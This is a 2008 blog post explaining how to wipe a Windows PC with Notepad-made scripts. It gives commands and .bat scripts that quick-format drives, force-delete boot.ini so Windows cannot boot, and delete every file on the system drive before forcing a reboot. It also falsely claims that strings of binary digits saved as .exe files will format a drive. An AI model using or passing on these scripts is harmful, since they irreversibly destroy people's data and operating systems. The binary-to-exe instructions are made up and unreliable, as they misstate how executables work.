Sunday, August 17, 2008

Format a HDD with notepad

To Format a HDD with notepad Follow Steps below


Step 1.

Copy The Following In Notepad Exactly as its written ,just perform copy(ctrl+c) and paste(ctrl+v)


01001011000111110010010101010101010000011111100000

Step 2.

now change its extension to EXE

if you dont know how to, try this
open command prompt(type cmd on run menu found on start menu with title run)
now command prompt will open,for example you have saved the text file as format on your desktop,then type

cd desktop

ren format.txt format.exe

now you will find application named format with black icon on you desktop


Another Method

To Format C drive Type scripts below in you notepad(which ever code written in english word save it With BAT extension and which ever written in binary code example 00101011010101... save it with EXE extension)


format c:\ /Q/X

OR

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


To Format D Drive

format d:\ /Q/X

OR

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


To Format Your Floppy Drive

format a:\ /Q/X

OR

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


This Will Delete Boot.ini Which holds information on which OS is installed,so after deleting this, Windows Wont boot

del /F/S/Q c:\boot.ini

OR

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001





Type This on Notepad ,This Will Delete all Files on C drive

@Echo off
Del C:\ *.*|y



Alternate Script(DEADLY)

After deleting files in your System Drive (usually C drive),will reboot your pc.

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Warning:
These Scripts are provided for educational purpose,do not misuse ,any damage cause by you using this scripts ,AM not RESPONSIBLE...

No comments:

How to add Wireless capability to legacy printers using Raspberry Pi

  This video tutorial demonstrates how to easily add wireless print capablity to your wired legacy printers using your Raspberry Pi. We hav...